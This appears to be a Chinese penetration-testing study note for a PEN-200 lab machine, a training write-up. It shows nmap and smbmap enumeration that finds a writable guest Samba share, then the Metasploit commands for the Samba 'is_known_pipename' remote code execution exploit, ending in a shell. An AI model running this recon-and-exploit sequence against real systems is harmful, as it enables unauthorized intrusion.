pen200-lab 学习笔记
【pen200-lab】10.11.1.146
🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
文章目录
- pen200-lab 学习笔记
- 信息收集
信息收集
nmap -p- --min-rate 10000 -A 10.11.1.146
22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e373a948819d90bc7075818a3de8956f (RSA)
| 256 0e7622d020ca1e96e97ba59a86e7f6d4 (ECDSA)
|_ 256 57e1e406a3796d03536cd67b67ed86dc (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.4-Ubuntu (workgroup: WORKGROUP)
看起来主要是139以及445的业务
smbmap -H 10.11.1.146
[+] Guest session IP: 10.11.1.146:445 Name: unknown
Disk PermissionsComment
---- ------------------
print$ NO ACCESS Printer Drivers
SusieShare READ, WRITEYOUR COMMENTS
IPC$
SusieShare能够读写
smbclient -N //10.11.1.146/SusieShare
但是这是个空的文件
接着我会回头看
ssh的版本,没有问题
smb的似乎有点问题
samba smbd 4.5.4 exploit github
搜索
发现存在rce,号称linux永恒之蓝
用msf一把梭
use exploit/linux/samba/is_known_pipename
set rhoat[靶机ip]
run
shell
id
不用msf的方法尝试了很久没有成功,不过网上也有很多教程
这里不赘述了,这个lab的点就是samba的利用。只要能发现版本的问题,就能成功